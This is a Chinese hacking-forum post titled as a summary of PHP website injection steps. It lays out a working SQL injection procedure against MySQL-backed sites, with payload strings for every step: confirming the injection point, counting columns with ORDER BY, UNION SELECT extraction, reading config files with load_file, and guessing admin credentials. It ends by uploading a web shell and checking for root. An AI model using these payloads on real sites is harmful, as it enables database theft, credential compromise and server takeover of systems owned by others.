黑帽联盟

 找回密码
 会员注册
查看: 1427|回复: 0
打印 上一主题 下一主题

[系统安全] php网站注入基本步骤小结

[复制链接]
yun 黑帽联盟官方人员 

920

主题

37

听众

1364

积分

超级版主

Rank: 8Rank: 8

  • TA的每日心情
    奋斗
    2019-10-18 11:20
  • 签到天数: 678 天

    [LV.9]以坛为家II

    php注入基本步骤小结,我们在编写代码的时候一定要注意注入点。

    php注入十点基本步骤

    1、判断是否存在注入,加'、and 1=1、and 1=2

    2、判断版本and ord(mid(version(),1,1))>51/* 返回正常说明是4.0以上版本,可以用union查询

    3、利用order by 暴字段,在网址后加 order by 10/* 如果返回正常说明字段大于10

    4、再利用union来查询准确字段,如: and 1=2 union select 1,2,3,......./* 直到返回正常报出数字,说明猜到准确字段数。如过滤了空格可以用/**/代替。

    (可在分别用user()、database()、version()进行替换报出的数字进而查看信息)

    5、判断数据库连接帐号有没有写权限,and (select count(*) from mysql.user)>0/* 如果结果返回错误,那我们只能猜解管理员帐号和密码了。

    6、如果返回正常,则可以通过and 1=2 union select 1,2,3,4,5,6,load_file(char(文件路径的ascii值,用逗号隔开)),8,9,10 /* 注:load_file(char(文件路径的ascii值,用逗号隔开))也可以用十六进制,通过这种方式读取配置文件,找到数据库连接等。

    7、首先猜解user表,如: and 1=2 union select 1,2,3,4,5,6....from user/* 如果返回正常,说明存在这个表。

    8、知道了表就猜解字段,and 1=2 union select 1,username,3,4,5,6....from user/* 按报出的数字进行替换

    9、同理再猜解password字段,猜解成功再找后台登录。

    10、登录后台,上传shell。

    11、检测是不是root权限 and/**/ord(mid(user(),1,1))=114/*

    帖子永久地址: 

    黑帽联盟 - 论坛版权1、本主题所有言论和图片纯属会员个人意见,与本论坛立场无关
    2、本站所有主题由该帖子作者发表,该帖子作者与黑帽联盟享有帖子相关版权
    3、其他单位或个人使用、转载或引用本文时必须同时征得该帖子作者和黑帽联盟的同意
    4、帖子作者须承担一切因本文发表而直接或间接导致的民事或刑事法律责任
    5、本帖部分内容转载自其它媒体,但并不代表本站赞同其观点和对其真实性负责
    6、如本帖侵犯到任何版权问题,请立即告知本站,本站将及时予与删除并致以最深的歉意
    7、黑帽联盟管理员和版主有权不事先通知发贴者而删除本文

    您需要登录后才可以回帖 登录 | 会员注册

    发布主题 !fastreply! 收藏帖子 返回列表 搜索
    回顶部